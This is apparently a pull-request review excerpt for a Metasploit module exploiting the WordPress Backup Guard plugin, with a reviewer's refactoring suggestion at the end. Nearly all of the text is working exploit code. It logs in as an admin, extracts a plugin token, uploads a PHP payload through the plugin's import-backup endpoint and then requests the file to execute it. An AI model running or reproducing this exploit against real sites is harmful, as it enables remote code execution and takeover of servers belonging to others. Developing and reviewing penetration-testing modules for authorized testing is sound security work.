modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb

```diff
@@ -0,0 +1,128 @@
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2021-05-04',
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
+      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
+    ]
+  end
+
+  def check
+    datastore['WPCHECK'] = true
+    unless wordpress_and_online?
+      fail_with(Failure::Unreachable, 'Server not online or not detected as wordpress')
+    end
+
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    if cookie
+      check_plugin_version_from_readme('backup', '1.6.0')
+    else
+      CheckCode::Unknown('The admin credentials given are wrong !')
+    end
+  end
+
+  def get_token(cookie)
+    r = send_request_cgi({
+      'method' => 'GET',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
+      'Referer' => full_uri('/wp-admin/users.php'),
+      'vars_get' => {
+        'page' => 'backup_guard_backups'
+      }
+    })
+    fail_with(Failure::Unknown, "Target #{RHOST} could not be reached.") unless r
+    r.body.to_s.match(/&token=(\h+)/)[1]
+  end
+
+  def exploit
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    fail_with(Failure::UnexpectedReply, 'Authentication failed') unless cookie
+    token = get_token(cookie)
+    fail_with(Failure::UnexpectedReply, "Didn't success to retrieve the Backup Guard token") unless token
+    payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.php"
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(payload.encoded, 'text/php', nil, "form-data; name='files[]'; filename=#{payload_name}.php")
+
+    print_status("Uploading file \'#{payload_name}\' containing the payload...")
+
+    r = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "/wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=#{token}"),
+      'headers' => {
+        'Origin' => full_uri(''),
+        'Referer' => full_uri('/wp-admin/admin.php?page=backup_guard_backups'),
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'cookie' => cookie,
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    )
+
+    if r&.code == 200
+
+      print_status('Triggering the payload ...')
+      send_request_cgi(
+        'method' => 'GET',
+        'cookie' => cookie,
+        'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/backup-guard/#{payload_name}.php")
+      )
+    else
+      fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file")
+    end
```

Comment:
Calling `fail_with()` first gets rid of a few lines:

```suggestion
    fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 200

    print_status('Triggering the payload ...')
    send_request_cgi(
      'method' => 'GET',
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/backup-guard/#{payload_name}.php")
    ) 
```